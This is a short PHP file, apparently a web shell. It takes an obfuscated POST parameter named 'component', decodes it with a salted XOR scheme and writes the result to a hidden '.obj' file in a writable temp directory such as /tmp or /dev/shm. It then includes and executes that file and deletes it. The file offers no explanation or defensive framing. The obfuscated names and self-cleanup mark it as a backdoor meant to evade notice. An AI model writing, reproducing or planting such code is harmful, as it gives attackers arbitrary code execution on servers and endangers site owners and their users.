<?php

if(array_key_exists("\x63o\x6D\x70\x6Fnent", $_POST)){
	$flag = $_POST["\x63o\x6D\x70\x6Fnent"];
	$flag		= 		explode			( 	 '.'  ,		$flag  	);		 
	$val= 	'';
            $salt= 	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS= 	strlen($salt  );
            $m= 	0;
            $len= 	count($flag  );
    
            do {
                if ($m >=$len) break;
                $v6= 	$flag[$m];
                $sChar= 	ord($salt[$m % $lenS]  );
                $dec= 	((int)$v6 - $sChar - ($m % 10)) ^ 51;
                $val.= chr($dec  );
                $m++;	}  while (true  );
	$res = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm"]);
	for ($data_chunk = 0, $binding = count($res); $data_chunk < $binding; $data_chunk++) {
    $elem = $res[$data_chunk];
    		if (is_dir($elem) && is_writable($elem)) {
    $factor = join("/", [$elem, ".obj"]);
    if (@file_put_contents($factor, $val) !== false) {
	include $factor;
	unlink($factor);
	die();
}
}
}
}